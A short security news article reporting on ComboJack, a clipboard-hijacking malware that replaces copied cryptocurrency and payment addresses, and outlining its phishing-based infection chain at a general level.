Security researchers that have a keen eye on ransomwares and malwares have recently discovered another new malware strain that has the abilities to detect when users copy addresses from a cryptocurrency account to their Windows clipboard. The malware not only detects the activity, but dupes it by replacing the specified address with that of its author.
The malware, which is currently named as ComboJack, is really similar to previous malwares like CryptoShuffler and Evrial. The difference between malwares of this nature from the past and ComboJack is that ComboJack supports all forms of cryptocurrencies and not just Bitcoin like the other malwares.
According to the famous Palo Alto Nwtorks, ComboJack has the ability to detect just when a user copies a cryptocurrency address not just from major crypto’s such as Bitcoin, Ethereum, Litecoin and Monero, but also from many other payment systems such as Yandex Money, Qiwi and WebMoney.
ComboJack is believed to be in active distribution as per the Palo Alto Networks. The company has mentioned that it recently detected the malware as a campaign that was targeting American and Japanese users.
Multi-Step Infection Chain
The exploitation chain for ComboJack is quite complex and hard to comprehend, but it follows the patterns that were seen last year with the Locky (Ransomware) and Dridex (banking Trojan) campaigns.
Crooks running the malware send an email to victims; which contains a scan from a lost passport. The file that is attached with this email is in a PDF format. If users download this PDF file from their email and open it, they will get an RTF file that is host to an embedded HTA object that exploits your DirectX vulnerability. On successful exploitation, this HTA file you’ve just opened runs PowerShell commands that are managed in the form of a series and execute a SFX. ComboJack is then installed when these SFX files are downloaded and run a password-protected SFX for the installation process to start.